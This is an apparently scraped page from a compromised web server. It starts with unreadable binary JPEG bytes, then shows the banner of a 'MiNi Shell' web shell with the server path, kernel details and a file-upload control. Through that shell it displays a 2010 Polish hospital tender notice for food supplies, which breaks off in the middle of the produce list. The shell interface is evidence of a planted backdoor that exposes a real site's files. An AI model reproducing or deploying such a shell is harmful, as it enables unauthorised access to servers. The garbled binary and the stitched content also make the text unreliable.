JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100226/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100226/42711-N-2010.html

<p class="kh_header"><b>Poddębice: Dostawa produktów żywnościowych dla SPZOZ w Poddębicach.</b><br>
<b>Numer ogłoszenia: 42711 - 2010; data zamieszczenia: 26.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Poddębicach , ul. Mickiewicza 16, 99-200 Poddębice, woj. łódzkie, tel. 043 678 36 22, faks 043 678 20 21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-poddebice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów żywnościowych dla SPZOZ w Poddębicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1	Przedmiotem zamówienia jest dostawa produktów żywnościowych dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Poddębicach, w ilościach i asortymencie szczegółowo określonych w Załączniku nr 3 do SIWZ - Formularz cenowy. 
3.2	Oferowany towar winien spełniać warunki szczegółowo określone w Formularzu cenowym - załącznik nr 3 do SIWZ. 
3.3	Wykonawca będzie dostarczał towar spełniający wymagania, co do jakości, terminu przydatności do spożycia i oznakowania, określone prawem, a w szczególności: ustawy z dnia 25 sierpnia 2006r o bezpieczeństwie żywności i żywienia (Dz. U. z 2006, Nr 171, poz. 1225 z późn. zm.), ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (tekst jednolity: Dz. U. 2005 r., Nr 187 poz. 1577 z późn. zm.) oraz rozporządzeniami z nimi powiązanymi.
3.4	Realizacja dostaw będzie się odbywać sukcesywnie na podstawie zamówień składanych przez upoważnionego pracownika Kuchni Zamawiającego za pośrednictwem faxu, za potwierdzeniem transmisji.
3.5	Dostawy towaru nastąpią według potrzeb Zamawiającego:
- 1 raz w tygodniu - we wtorek (zamówienie złożone minimum 48h przed dostawą towarów) - dla pakietów: 1, 2, 3, 7, 8, 12;
	- w ciągu 24 h od złożenia zamówienia - dla pakietów: 4, 5, 6, 9, 10, 11, 13.
3.6	Realizacja dostaw będzie odbywać się w godzinach 7:00-14:00 lub innych uzgodnionych każdorazowo z upoważnionym pracownikiem Kuchni Zamawiającego, a w przypadku pakietów 4, 5, 10 do godziny 7:00.
3.7	Dostawa przedmiotu umowy odbywać się będzie na koszt i ryzyko Wykonawcy do Kuchni Zamawiającego mieszczącej się w Internacie Zespołu Szkół Ponadgimnazjalnych w Poddębicach, przy ulicy Polnej 9. Wykonawca zobowiązany jest do złożenia zamówionego towaru w miejscu wskazanym przez pracownika Kuchni Zamawiającego.
3.8	Faktyczna ilość zamawianych produktów żywnościowych zależna będzie od rzeczywistych potrzeb Zamawiającego. Określone przez Zamawiającego w Załączniku nr 3 do SIWZ (stanowiącym załącznik nr 1 do umowy) ilości produktów żywnościowych nie stanowią zobowiązania Zamawiającego do ich zakupienia u Wykonawcy i nie mogą być podstawą żadnych roszczeń ze strony Wykonawcy.
3.9	Wykonawca jest zobowiązany dostarczać produkty oznaczone w pakietach odpowiadające normom kontroli jakości w obowiązującym systemie GHP, GMP, HACCP.
3.10	Dostawa przedmiotu zamówienia odbywać się będzie w odpowiednich opakowaniach (zamkniętych i nieuszkodzonych), transportem zapewniającym należyte zabezpieczenie przed czynnikami zewnętrznymi i przystosowanym do przewozu żywności - zgodnie z obowiązującymi przepisami.
3.11	Produkty muszą być odpowiednio oznakowane, posiadać datę minimalnej trwałości i termin przydatności do spożycia.
3.12	Produkty muszą być świeże, całe, zdrowe, bez objawów gnicia lub zepsucia, wolne od jakichkolwiek zanieczyszczeń, od szkodników, dostatecznie dojrzałe oraz nie mogą posiadać obić i oparzelin słonecznych (dla pakietu nr 6, 13). 
3.13	Ewentualne reklamacje dostaw z tytułu jakości lub ilości dostarczonego towaru składane będą Wykonawcy za pośrednictwem faxu, za potwierdzeniem transmisji niezwłocznie po ich stwierdzeniu przez Zamawiającego.
3.14	Wykonawca jest zobowiązany do udzielenia odpowiedzi na złożoną reklamację w ciągu 24 h od chwili złożenia reklamacji, a w przypadku braku odpowiedzi reklamację uważać się będzie w całości uznaną przez Wykonawcę.
3.15	W przypadku uznania reklamacji za zasadną Wykonawca zobowiązany jest w terminie 48 h od chwili uznania reklamacji wymienić towar na wolny od wad bądź uzupełnić braki ilościowe na własny koszt i we własnym zakresie.
3.16	W przypadku brak realizacji zamówienia w terminach określonych w pkt. 3.5  niniejszego rozdziału, a także w przypadku uchybienia terminowi, o którym mowa w pkt. 3.15 niniejszego rozdziału - Zamawiający ma prawo dokonać zakupu przedmiotu zamówienia we własnym zakresie i obciążyć Wykonawcę wszelkimi kosztami poniesionymi z tego tytułu oraz naliczyć kary umowne określone w § 6 ust.1 ppkt. 1.2 i 1.4. wzoru umowy - Załącznik nr 2 do SIWZ.
3.17	Zamawiający dopuszcza możliwość zamieszczenia przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SIWZ) i Formularzu cenowym (Załącznik Nr 3 do SIWZ) tylko tych pakietów na które składa ofertę. 
3.18	Zamawiający zastrzega sobie stałość cen przez okres obowiązywania umowy za wyjątkiem zmian stawki podatku VAT, które to obowiązują z chwilą wprowadzenia ich stosowanymi przepisami.
3.19	Zamawiający przewiduje możliwość wprowadzenia zmiany w umowie w przypadku zaprzestania produkcji którejkolwiek z części asortymentu będącego przedmiotem umowy, wówczas Wykonawca zobowiązuje się do niezwłocznego potwierdzenia stosownym dokumentem zaprzestania wytwarzania produktu oraz do przedstawienia Zamawiającemu propozycji zamiennika takiego wyrobu o parametrach nie gorszych niż zaoferowane w przetargu w cenie zaoferowanej za przedmiot umowy w przetargu lub cenie korzystniejszej dla Zamawiającego niż w przetargu. Zmiana umowy w tym zakresie nastąpi po pisemnym zaakceptowaniu przez Zamawiającego propozycji zamiennika.
3.20	Dopuszcza się zmiany umowy polegające na obniżeniu ceny jednostkowej towaru..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.32.00.00-7, 15.33.14.00-1, 15.13.13.10-1, 03.14.25.00-3, 15.81.10.00-6, 15.50.00.00-3, 15.51.10.00-3, 03.22.00.00-9, 03.21.21.00-1, 03.22.21.11-4, 15.33.21.00-5, 15.22.00.00-6, 03.31.10.00-2, 15.33.11.70-9, 15.11.00.00-2, 15.11.20.00-6, 15.13.11.30-5, 15.61.22.00-3, 15.61.33.11-1, 15.89.80.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w przedmiotowym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia ww. warunku zamawiający wymaga, aby Wykonawcy złożyli oświadczenie będące Załącznikiem Nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia ww. warunku zamawiający wymaga, aby Wykonawcy złożyli oświadczenie będące Załącznikiem Nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia ww. warunku zamawiający wymaga, aby Wykonawcy złożyli oświadczenie będące Załącznikiem Nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia ww. warunku zamawiający wymaga, aby Wykonawcy złożyli oświadczenie będące Załącznikiem Nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełnienia ww. warunku zamawiający wymaga, aby Wykonawcy złożyli oświadczenie będące Załącznikiem Nr 4 do SIWZ.
Zamawiający informuje że:
na podstawie art. 26 ust. 2b ustawy Prawo zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Ocena spełniania ww. warunków dokonana zostanie na zasadzie spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach wymienionych w pkt. 8 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Informacja o zawartości oferty:
Ofertę stanowi: Formularz ofertowy  - Załącznik Nr 1 do SIWZ.
Dokumenty składane z ofertą:
- Oświadczenia i dokumenty wymienione w pkt 8.1-8.3 SIWZ.
- Wypełniony Formularz cenowy - Załącznik Nr 3 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość wprowadzenia zmiany w umowie w przypadku zaprzestania produkcji którejkolwiek z części asortymentu będącego przedmiotem umowy, wówczas Wykonawca zobowiązuje się do niezwłocznego potwierdzenia stosownym dokumentem zaprzestania wytwarzania produktu oraz do przedstawienia Zamawiającemu propozycji zamiennika takiego wyrobu o parametrach nie gorszych niż zaoferowane w przetargu w cenie zaoferowanej za przedmiot umowy w przetargu lub cenie korzystniejszej dla Zamawiającego niż w przetargu. Zmiana umowy w tym zakresie nastąpi po pisemnym zaakceptowaniu przez Zamawiającego propozycji zamiennika. 
2. Dopuszcza się zmiany umowy polegające na obniżeniu ceny jednostkowej towaru.
3. Dopuszcza się zmiany stawki podatku VAT, które to obowiązują z chwilą wprowadzenia ich stosowanymi przepisami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-poddebice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Poddębicach, ul. Mickiewicza 16, 99-200 Poddębice, Budynek Administracji, Sekretariat Dyrekcji (I  piętro)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2010 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Poddębicach, ul. Mickiewicza 16, 99-200 Poddębice, Budynek Administracji, Sekretariat Dyrekcji (I  piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1 - - PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cukier, 1kg - 1300 kg;
2. Sól jodowana 1kg - 320 kg;
3. Mąka 1kg typ 480 - 1100 kg;
4. Kleik ryżowy 170g - 300 szt.;
5. Suchary b/c 220 - 300 g - 120 szt.;
6. Przyprawa warzywna 200g - 400 szt.;
7. Przyprawa do kurczaka 100g - 60 szt.;
8. Przyprawa do gulaszu 20 g - 30 szt.;
9. Przyprawa do zup w płynie 250g - 20 szt.;
10. Olej rzepakowy 1L - 450 szt.;
11. Herbata 100g - 740 szt.;
12. Kawa zbożowa 250g - 20 szt.;
13. Kakao ciemne 100g - 10 szt.;
14. Chrupki kukurydziane 60g - 300 szt.;
15. Chleb ryżowy 130g - 150 szt.;
16. Bułka tarta - 25 kg;
17. Ryż sypki 1kg - 130 kg;
18. Kasza manna 1kg - 210 kg;
19. Kasza jęczmienna 1kg - 330 kg;
20. Kwasek cytrynowy 20g - 820 szt.;
21. Makaron świderki - 200 kg;
22. Makaron rurka - 200 kg;
23. Makaron krajanka - 200 kg;
24. Makaron nitka - 35 kg;
25. Zacierka makaronowa 250g - 480 szt.;
26. Majeranek 15g - 50 szt.;
27. Liść laurowy 10g - 40 szt.;
28. Ziele angielskie 15g - 40 szt.;
29. Barszcz biały w płynie 0,5L - 150 szt.;
30. Pieprz mielony 15g - 170 szt.;
31. Musztarda 200g - 10 szt.;
32. Dżem 25g - 3000 szt.;
33. Miód naturalny wielokwiatowy 25g - 50 szt.;
34. Kisiel 40g (truskawka, cytryna) - 250 szt.;
35. Galaretka 90g (truskawka, morela) - 250 szt.;
36. Budyń śmietankowy (? 1 mleka) 40g - 50 szt.;
37. Herbatniki 14-20 g - 800 szt.;
38. Krakersy 180g - 60 szt.;
39. Ciastka bez czekolady - 25 kg;
40. Chrzan 190g - 10 szt.;
41. Soda oczyszczona 80g - 480 szt.;
42. Ryż -saszetki 4x100g - 300 szt.;
43. Ocet 0,5L - 15 szt.;
44. Wafelki bez czekolady 20 g - 1000 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 2 - PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Sok owocowo-warzywny b/c (środek spożywczy specjalnego przeznaczenia ) 175ml - 150 szt.;
2. Koncentrat pomidorowy 30% 0,9L - 120 szt.;
3. Koncentrat pomidorowy 70g - 230 szt.;
4. Majonez 700 - 720g - 50 szt.;
5. Groszek konserwowy 400g - 120 szt.;
6. Szczaw konserwowy 270 - 320 g - 70 szt.;
7. Barszcz czerwony-koncentrat (w płynie) 320-380 ml - 100 szt.;
8. Kukurydza 400g - 30 szt.;
9. Pasztet drobiowy 130g - 150 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.32.00.00-7, 15.33.14.00-1, 15.13.13.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 3 - JAJA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Jaja L 60-65 - 8000 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet Nr 4 - PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Chleb pszenno-żytni 1200g - 3500szt.;
2. Chleb razowy 600g - 2100 szt.;
3. Bułka zwykła 50g - 3900 szt.;
4. Bułka słodka 100g - 40 szt.;
5. Pączek 100g - 40 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet Nr 5 - MLEKO I NABIAŁ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Mleko 2% -1L - 9000 szt.;
2. Masło roślinne kostka 250g - 3000 szt.;
3. Śmietana - 18% 400 g - 300 szt.;
4. Ser biały półtłusty - 450 kg;
5. Ser żółty, Salami, Morski lub równoważny - 100 kg;
6. Ser topiony-plastry, 130g - 1000 szt.;
7. Ser topiony- krążek 140g - 800 szt.;
8. Ser z twarogu i śmietany (Ser kiri lub równoważny) 100g Śmietankowy - 600 szt.;
9. Ser z twarogu i śmietany z dodatkami smakowymi np.. Papryką, szynką, czosnkiem (Ser mini lub równoważny) 20g - 100 szt.;
10. Jogurt naturalny b/c 135g - 1800 szt.;
11. Jogurt owocowy 120g - 1300 szt.;
12. Kefir 1L - 25 szt.;
13. Mleko w kartonie 2% 1 L - 10 szt.;
14. Serek homogenizowany 120g - 40 szt.;
15. Serek homogenizowany 50g - 60 szt.;
16. Margaryna 250g - 350 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet Nr 6 - ZIEMINIAKI, WARZYWA, OWOCE, KISZONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Ziemniaki - 13000 kg;
2. Marchew - 3000 kg;
3. Pietruszka - 70 kg;
4. Seler - 780 kg
5. Por - 120 szt.;
6. Burak - 1800 Kg;
7. Botwina - 100 szt.;
8. Kapusta biała - 680 kg;
9. Kapusta młoda - 170 szt.;
10. Kapusta pekińska - 380 kg;
11. Kapusta czerwona - 60 Kg;
12. Włoszczyzna pęczek - 1100 szt.;
13. Cebula biała - 250 kg;
14. Pieczarka - 50 kg;
15. Jabłka odmiany krajowe, średniej wielkości - 2000 kg;
16. Ogórek zielony - 25 kg;
17. Ogórek kwaszony - 430 kg;
18. Pomidory - 150 kg.
19. Koperek pęczek - 400 szt.;
20. Natka pietruszki pęczek - 800 szt.;
21. Kalafior - 400 szt.;
22. Brokuły - 30 szt.;
23. Sałata siewna - 1200 szt.;
24. Fasolka szparagowa - 25 kg.;
25. Brukselka - 10 kg.;
26. Groch łupany - 5 kg.;
27. Kapusta kiszona - 330 kg.;
